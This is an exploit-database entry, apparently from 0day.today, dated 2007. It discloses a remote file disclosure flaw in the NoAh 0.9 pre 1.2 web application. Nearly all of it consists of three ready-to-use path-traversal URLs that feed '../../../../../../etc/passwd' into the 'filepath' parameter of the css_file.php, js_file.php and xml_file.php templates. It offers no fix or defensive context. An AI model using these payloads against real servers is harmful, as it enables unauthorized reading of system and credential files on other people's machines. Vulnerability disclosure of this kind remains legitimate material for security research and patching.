id: 2327
date: 11/28/2007
title: NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
author: GoLd_M
cves: 

=====================================================================
NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
=====================================================================



NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
Script :    /noah0.9_pre1.2.tar.gz/
Exploits :
/noah/modules/nosystem/templates/css_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/js_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/xml_file.php?filepath=../../../../../../etc/passwd




#  0day.today [2023-03-24]  #